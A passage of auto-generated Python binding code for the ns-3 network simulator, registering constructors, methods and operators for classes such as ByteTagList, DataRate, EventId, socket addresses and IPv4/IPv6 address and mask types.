## byte-tag-list.h (module 'network'): ns3::TagBuffer ns3::ByteTagList::Add(ns3::TypeId tid, uint32_t bufferSize, int32_t start, int32_t end) [member function]
cls.add_method('Add',
'ns3::TagBuffer',
[param('ns3::TypeId', 'tid'), param('uint32_t', 'bufferSize'), param('int32_t', 'start'), param('int32_t', 'end')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::Add(ns3::ByteTagList const & o) [member function]
cls.add_method('Add',
'void',
[param('ns3::ByteTagList const &', 'o')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtEnd(int32_t adjustment, int32_t appendOffset) [member function]
cls.add_method('AddAtEnd',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'appendOffset')])
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::AddAtStart(int32_t adjustment, int32_t prependOffset) [member function]
cls.add_method('AddAtStart',
'void',
[param('int32_t', 'adjustment'), param('int32_t', 'prependOffset')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator ns3::ByteTagList::Begin(int32_t offsetStart, int32_t offsetEnd) const [member function]
cls.add_method('Begin',
'ns3::ByteTagList::Iterator',
[param('int32_t', 'offsetStart'), param('int32_t', 'offsetEnd')],
is_const=True)
## byte-tag-list.h (module 'network'): void ns3::ByteTagList::RemoveAll() [member function]
cls.add_method('RemoveAll',
'void',
[])
return
def register_Ns3ByteTagListIterator_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Iterator(ns3::ByteTagList::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator const &', 'arg0')])
## byte-tag-list.h (module 'network'): uint32_t ns3::ByteTagList::Iterator::GetOffsetStart() const [member function]
cls.add_method('GetOffsetStart',
'uint32_t',
[],
is_const=True)
## byte-tag-list.h (module 'network'): bool ns3::ByteTagList::Iterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item ns3::ByteTagList::Iterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagList::Iterator::Item',
[])
return
def register_Ns3ByteTagListIteratorItem_methods(root_module, cls):
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::ByteTagList::Iterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagList::Iterator::Item const &', 'arg0')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::Item(ns3::TagBuffer buf) [constructor]
cls.add_constructor([param('ns3::TagBuffer', 'buf')])
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::buf [variable]
cls.add_instance_attribute('buf', 'ns3::TagBuffer', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::end [variable]
cls.add_instance_attribute('end', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::size [variable]
cls.add_instance_attribute('size', 'uint32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::start [variable]
cls.add_instance_attribute('start', 'int32_t', is_const=False)
## byte-tag-list.h (module 'network'): ns3::ByteTagList::Iterator::Item::tid [variable]
cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3ChannelList_methods(root_module, cls):
## channel-list.h (module 'network'): ns3::ChannelList::ChannelList() [constructor]
cls.add_constructor([])
## channel-list.h (module 'network'): ns3::ChannelList::ChannelList(ns3::ChannelList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ChannelList const &', 'arg0')])
## channel-list.h (module 'network'): static uint32_t ns3::ChannelList::Add(ns3::Ptr<ns3::Channel> channel) [member function]
cls.add_method('Add',
'uint32_t',
[param('ns3::Ptr< ns3::Channel >', 'channel')],
is_static=True)
## channel-list.h (module 'network'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Channel>*,std::vector<ns3::Ptr<ns3::Channel>, std::allocator<ns3::Ptr<ns3::Channel> > > > ns3::ChannelList::Begin() [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Channel > const, std::vector< ns3::Ptr< ns3::Channel > > >',
[],
is_static=True)
## channel-list.h (module 'network'): static __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::Channel>*,std::vector<ns3::Ptr<ns3::Channel>, std::allocator<ns3::Ptr<ns3::Channel> > > > ns3::ChannelList::End() [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::Channel > const, std::vector< ns3::Ptr< ns3::Channel > > >',
[],
is_static=True)
## channel-list.h (module 'network'): static ns3::Ptr<ns3::Channel> ns3::ChannelList::GetChannel(uint32_t n) [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[param('uint32_t', 'n')],
is_static=True)
## channel-list.h (module 'network'): static uint32_t ns3::ChannelList::GetNChannels() [member function]
cls.add_method('GetNChannels',
'uint32_t',
[],
is_static=True)
return
def register_Ns3DataRate_methods(root_module, cls):
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('!=')
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('>=')
## data-rate.h (module 'network'): ns3::DataRate::DataRate(ns3::DataRate const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DataRate const &', 'arg0')])
## data-rate.h (module 'network'): ns3::DataRate::DataRate() [constructor]
cls.add_constructor([])
## data-rate.h (module 'network'): ns3::DataRate::DataRate(uint64_t bps) [constructor]
cls.add_constructor([param('uint64_t', 'bps')])
## data-rate.h (module 'network'): ns3::DataRate::DataRate(std::string rate) [constructor]
cls.add_constructor([param('std::string', 'rate')])
## data-rate.h (module 'network'): double ns3::DataRate::CalculateTxTime(uint32_t bytes) const [member function]
cls.add_method('CalculateTxTime',
'double',
[param('uint32_t', 'bytes')],
is_const=True)
## data-rate.h (module 'network'): uint64_t ns3::DataRate::GetBitRate() const [member function]
cls.add_method('GetBitRate',
'uint64_t',
[],
is_const=True)
return
def register_Ns3EventId_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_binary_comparison_operator('==')
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::EventId const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventId const &', 'arg0')])
## event-id.h (module 'core'): ns3::EventId::EventId() [constructor]
cls.add_constructor([])
## event-id.h (module 'core'): ns3::EventId::EventId(ns3::Ptr<ns3::EventImpl> const & impl, uint64_t ts, uint32_t context, uint32_t uid) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::EventImpl > const &', 'impl'), param('uint64_t', 'ts'), param('uint32_t', 'context'), param('uint32_t', 'uid')])
## event-id.h (module 'core'): void ns3::EventId::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-id.h (module 'core'): uint32_t ns3::EventId::GetContext() const [member function]
cls.add_method('GetContext',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): uint64_t ns3::EventId::GetTs() const [member function]
cls.add_method('GetTs',
'uint64_t',
[],
is_const=True)
## event-id.h (module 'core'): uint32_t ns3::EventId::GetUid() const [member function]
cls.add_method('GetUid',
'uint32_t',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsExpired() const [member function]
cls.add_method('IsExpired',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): bool ns3::EventId::IsRunning() const [member function]
cls.add_method('IsRunning',
'bool',
[],
is_const=True)
## event-id.h (module 'core'): ns3::EventImpl * ns3::EventId::PeekEventImpl() const [member function]
cls.add_method('PeekEventImpl',
'ns3::EventImpl *',
[],
is_const=True)
return
def register_Ns3Inet6SocketAddress_methods(root_module, cls):
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Inet6SocketAddress const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Inet6SocketAddress const &', 'arg0')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6, uint16_t port) [constructor]
cls.add_constructor([param('ns3::Ipv6Address', 'ipv6'), param('uint16_t', 'port')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(ns3::Ipv6Address ipv6) [constructor]
cls.add_constructor([param('ns3::Ipv6Address', 'ipv6')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(uint16_t port) [constructor]
cls.add_constructor([param('uint16_t', 'port')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6, uint16_t port) [constructor]
cls.add_constructor([param('char const *', 'ipv6'), param('uint16_t', 'port')])
## inet6-socket-address.h (module 'network'): ns3::Inet6SocketAddress::Inet6SocketAddress(char const * ipv6) [constructor]
cls.add_constructor([param('char const *', 'ipv6')])
## inet6-socket-address.h (module 'network'): static ns3::Inet6SocketAddress ns3::Inet6SocketAddress::ConvertFrom(ns3::Address const & addr) [member function]
cls.add_method('ConvertFrom',
'ns3::Inet6SocketAddress',
[param('ns3::Address const &', 'addr')],
is_static=True)
## inet6-socket-address.h (module 'network'): ns3::Ipv6Address ns3::Inet6SocketAddress::GetIpv6() const [member function]
cls.add_method('GetIpv6',
'ns3::Ipv6Address',
[],
is_const=True)
## inet6-socket-address.h (module 'network'): uint16_t ns3::Inet6SocketAddress::GetPort() const [member function]
cls.add_method('GetPort',
'uint16_t',
[],
is_const=True)
## inet6-socket-address.h (module 'network'): static bool ns3::Inet6SocketAddress::IsMatchingType(ns3::Address const & addr) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'addr')],
is_static=True)
## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetIpv6(ns3::Ipv6Address ipv6) [member function]
cls.add_method('SetIpv6',
'void',
[param('ns3::Ipv6Address', 'ipv6')])
## inet6-socket-address.h (module 'network'): void ns3::Inet6SocketAddress::SetPort(uint16_t port) [member function]
cls.add_method('SetPort',
'void',
[param('uint16_t', 'port')])
return
def register_Ns3InetSocketAddress_methods(root_module, cls):
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::InetSocketAddress const & arg0) [copy constructor]
cls.add_constructor([param('ns3::InetSocketAddress const &', 'arg0')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4, uint16_t port) [constructor]
cls.add_constructor([param('ns3::Ipv4Address', 'ipv4'), param('uint16_t', 'port')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(ns3::Ipv4Address ipv4) [constructor]
cls.add_constructor([param('ns3::Ipv4Address', 'ipv4')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(uint16_t port) [constructor]
cls.add_constructor([param('uint16_t', 'port')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4, uint16_t port) [constructor]
cls.add_constructor([param('char const *', 'ipv4'), param('uint16_t', 'port')])
## inet-socket-address.h (module 'network'): ns3::InetSocketAddress::InetSocketAddress(char const * ipv4) [constructor]
cls.add_constructor([param('char const *', 'ipv4')])
## inet-socket-address.h (module 'network'): static ns3::InetSocketAddress ns3::InetSocketAddress::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::InetSocketAddress',
[param('ns3::Address const &', 'address')],
is_static=True)
## inet-socket-address.h (module 'network'): ns3::Ipv4Address ns3::InetSocketAddress::GetIpv4() const [member function]
cls.add_method('GetIpv4',
'ns3::Ipv4Address',
[],
is_const=True)
## inet-socket-address.h (module 'network'): uint16_t ns3::InetSocketAddress::GetPort() const [member function]
cls.add_method('GetPort',
'uint16_t',
[],
is_const=True)
## inet-socket-address.h (module 'network'): static bool ns3::InetSocketAddress::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetIpv4(ns3::Ipv4Address address) [member function]
cls.add_method('SetIpv4',
'void',
[param('ns3::Ipv4Address', 'address')])
## inet-socket-address.h (module 'network'): void ns3::InetSocketAddress::SetPort(uint16_t port) [member function]
cls.add_method('SetPort',
'void',
[param('uint16_t', 'port')])
return
def register_Ns3Ipv4Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(ns3::Ipv4Address const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(uint32_t address) [constructor]
cls.add_constructor([param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address::Ipv4Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::CombineMask(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('CombineMask',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv4Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv4Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Address::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetBroadcast() [member function]
cls.add_method('GetBroadcast',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4Address::GetSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('GetSubnetDirectedBroadcast',
'ns3::Ipv4Address',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Address ns3::Ipv4Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Address',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsEqual(ns3::Ipv4Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Address const &', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsLocalMulticast() const [member function]
cls.add_method('IsLocalMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): static bool ns3::Ipv4Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Address::IsSubnetDirectedBroadcast(ns3::Ipv4Mask const & mask) const [member function]
cls.add_method('IsSubnetDirectedBroadcast',
'bool',
[param('ns3::Ipv4Mask const &', 'mask')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(uint32_t address) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'address')])
## ipv4-address.h (module 'network'): void ns3::Ipv4Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
return
def register_Ns3Ipv4Mask_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(ns3::Ipv4Mask const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(uint32_t mask) [constructor]
cls.add_constructor([param('uint32_t', 'mask')])
## ipv4-address.h (module 'network'): ns3::Ipv4Mask::Ipv4Mask(char const * mask) [constructor]
cls.add_constructor([param('char const *', 'mask')])
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::Get() const [member function]
cls.add_method('Get',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): uint32_t ns3::Ipv4Mask::GetInverse() const [member function]
cls.add_method('GetInverse',
'uint32_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): uint16_t ns3::Ipv4Mask::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint16_t',
[],
is_const=True)
## ipv4-address.h (module 'network'): static ns3::Ipv4Mask ns3::Ipv4Mask::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv4Mask',
[],
is_static=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsEqual(ns3::Ipv4Mask other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv4Mask', 'other')],
is_const=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4Mask::IsMatch(ns3::Ipv4Address a, ns3::Ipv4Address b) const [member function]
cls.add_method('IsMatch',
'bool',
[param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4Mask::Set(uint32_t mask) [member function]
cls.add_method('Set',
'void',
[param('uint32_t', 'mask')])
return
def register_Ns3Ipv6Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(char const * address) [constructor]
cls.add_constructor([param('char const *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(uint8_t * address) [constructor]
cls.add_constructor([param('uint8_t *', 'address')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const & addr) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address::Ipv6Address(ns3::Ipv6Address const * addr) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const *', 'addr')])
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6Address::CombinePrefix(ns3::Ipv6Prefix const & prefix) [member function]
cls.add_method('CombinePrefix',
'ns3::Ipv6Address',
[param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::Ipv6Address',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::Deserialize(uint8_t const * buf) [member function]
cls.add_method('Deserialize',
'ns3::Ipv6Address',
[param('uint8_t const *', 'buf')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllHostsMulticast() [member function]
cls.add_method('GetAllHostsMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllNodesMulticast() [member function]
cls.add_method('GetAllNodesMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAllRoutersMulticast() [member function]
cls.add_method('GetAllRoutersMulticast',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetAny() [member function]
cls.add_method('GetAny',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv6Address::GetIpv4MappedAddress() const [member function]
cls.add_method('GetIpv4MappedAddress',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Address',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllHostsMulticast() const [member function]
cls.add_method('IsAllHostsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllNodesMulticast() const [member function]
cls.add_method('IsAllNodesMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAllRoutersMulticast() const [member function]
cls.add_method('IsAllRoutersMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsAny() const [member function]
cls.add_method('IsAny',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsEqual(ns3::Ipv6Address const & other) const [member function]
cls.add_method('IsEqual',
'bool',
[param('ns3::Ipv6Address const &', 'other')],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsIpv4MappedAddress() [member function]
cls.add_method('IsIpv4MappedAddress',
'bool',
[])
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocal() const [member function]
cls.add_method('IsLinkLocal',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLinkLocalMulticast() const [member function]
cls.add_method('IsLinkLocalMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsLocalhost() const [member function]
cls.add_method('IsLocalhost',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static bool ns3::Ipv6Address::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Address::IsSolicitedMulticast() const [member function]
cls.add_method('IsSolicitedMulticast',
'bool',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredAddress(ns3::Mac48Address addr, ns3::Ipv6Address prefix) [member function]
cls.add_method('MakeAutoconfiguredAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeAutoconfiguredLinkLocalAddress(ns3::Mac48Address mac) [member function]
cls.add_method('MakeAutoconfiguredLinkLocalAddress',
'ns3::Ipv6Address',
[param('ns3::Mac48Address', 'mac')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeIpv4MappedAddress(ns3::Ipv4Address addr) [member function]
cls.add_method('MakeIpv4MappedAddress',
'ns3::Ipv6Address',
[param('ns3::Ipv4Address', 'addr')],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Address ns3::Ipv6Address::MakeSolicitedAddress(ns3::Ipv6Address addr) [member function]
cls.add_method('MakeSolicitedAddress',
'ns3::Ipv6Address',
[param('ns3::Ipv6Address', 'addr')],
is_static=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Serialize(uint8_t * buf) const [member function]
cls.add_method('Serialize',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(char const * address) [member function]
cls.add_method('Set',
'void',
[param('char const *', 'address')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Address::Set(uint8_t * address) [member function]
cls.add_method('Set',
'void',
[param('uint8_t *', 'address')])
return
def register_Ns3Ipv6Prefix_methods(root_module, cls):
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t * prefix) [constructor]
cls.add_constructor([param('uint8_t *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(char const * prefix) [constructor]
cls.add_constructor([param('char const *', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(uint8_t prefix) [constructor]
cls.add_constructor([param('uint8_t', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const & prefix) [copy constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'prefix')])
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix::Ipv6Prefix(ns3::Ipv6Prefix const * prefix) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const *', 'prefix')])
## ipv6-address.h (module 'network'): void ns3::Ipv6Prefix::GetBytes(uint8_t * buf) const [member function]
cls.add_method('GetBytes',
'void',
[param('uint8_t *', 'buf')],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetLoopback() [member function]
cls.add_method('GetLoopback',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetOnes() [member function]
cls.add_method('GetOnes',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): uint8_t ns3::Ipv6Prefix::GetPrefixLength() const [member function]
cls.add_method('GetPrefixLength',
'uint8_t',
[],
is_const=True)
## ipv6-address.h (module 'network'): static ns3::Ipv6Prefix ns3::Ipv6Prefix::GetZero() [member function]
cls.add_method('GetZero',
'ns3::Ipv6Prefix',
[],
is_static=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6Prefix::IsEqual(ns3::Ipv6Prefix const & other) const [member function]
cls.add_method('IsEqual',
'bool',
